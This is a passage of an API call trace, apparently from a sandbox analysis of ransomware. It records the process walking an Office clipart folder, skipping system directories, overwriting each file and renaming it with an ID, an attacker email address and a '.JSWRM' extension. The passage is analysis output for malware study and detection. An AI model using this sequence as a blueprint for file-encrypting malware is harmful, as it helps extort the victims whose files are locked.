cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSWAVY.WMF", lpUsedDefaultChar=0x0) returned 10 [0095.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0095.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pswavy.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.297] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2834) returned 1 [0095.297] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb10) returned 0x23fc98 [0095.297] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb10, lpOverlapped=0x0) returned 1 [0095.301] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.301] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb10, lpOverlapped=0x0) returned 1 [0095.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.301] CloseHandle (hObject=0x314) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0095.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0095.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0095.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0095.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.301] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pswavy.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pswavy.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0095.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.302] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="RE00006_.WMF", cAlternateFileName="")) returned 1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2=".") returned 1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="..") returned 1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="...") returned 1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="windows") returned -1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="recovery") returned -1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="perflogs") returned 1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="documents and settings") returned 1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.302] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="system volume information") returned -1 [0095.303] lstrcmpiW (lpString1="RE00006_.WMF", lpString2="msocache") returned 1 [0095.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RE00006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RE00006_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RE00006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0095.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RE00006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RE00006_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RE00006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0095.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0095.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\re00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.303] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1772) returned 1 [0095.303] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e0) returned 0x20c6c0 [0095.303] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x6e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x6e0, lpOverlapped=0x0) returned 1 [0095.306] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.306] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x6e0, lpOverlapped=0x0) returned 1 [0095.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0095.306] CloseHandle (hObject=0x314) returned 1 [0095.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0095.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0095.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0095.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0095.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0095.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.307] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\re00006_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\re00006_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0095.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0095.307] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd16, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="RECYCLE.WMF", cAlternateFileName="")) returned 1 [0095.307] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2=".") returned 1 [0095.307] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="..") returned 1 [0095.307] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="...") returned 1 [0095.307] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="windows") returned -1 [0095.308] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="recovery") returned 1 [0095.308] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="perflogs") returned 1 [0095.308] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="documents and settings") returned 1 [0095.308] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.308] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="system volume information") returned -1 [0095.308] lstrcmpiW (lpString1="RECYCLE.WMF", lpString2="msocache") returned 1 [0095.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0095.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECYCLE.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECYCLE.WMF", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECYCLE.WMF", lpUsedDefaultChar=0x0) returned 11 [0095.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0095.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0095.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECYCLE.WMF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECYCLE.WMF", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECYCLE.WMF", lpUsedDefaultChar=0x0) returned 11 [0095.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0095.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.308] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\recycle.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.308] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3350) returned 1 [0095.309] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd10) returned 0x23fc98 [0095.309] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0095.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.311] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0095.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.311] CloseHandle (hObject=0x314) returned 1 [0095.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0095.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0095.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0095.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0095.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0095.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.311] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\recycle.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\recycle.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0095.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.312] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x175f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="ROAD_01.MID", cAlternateFileName="")) returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2=".") returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="..") returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="...") returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="windows") returned -1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="recovery") returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="perflogs") returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="documents and settings") returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="system volume information") returned -1 [0095.312] lstrcmpiW (lpString1="ROAD_01.MID", lpString2="msocache") returned 1 [0095.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0095.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROAD_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROAD_01.MID", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROAD_01.MID", lpUsedDefaultChar=0x0) returned 11 [0095.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0095.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0095.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROAD_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROAD_01.MID", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROAD_01.MID", lpUsedDefaultChar=0x0) returned 11 [0095.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0095.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.314] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5983) returned 1 [0095.314] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.314] RtlAllocateHeap (HeapHandle=0x1e0000, 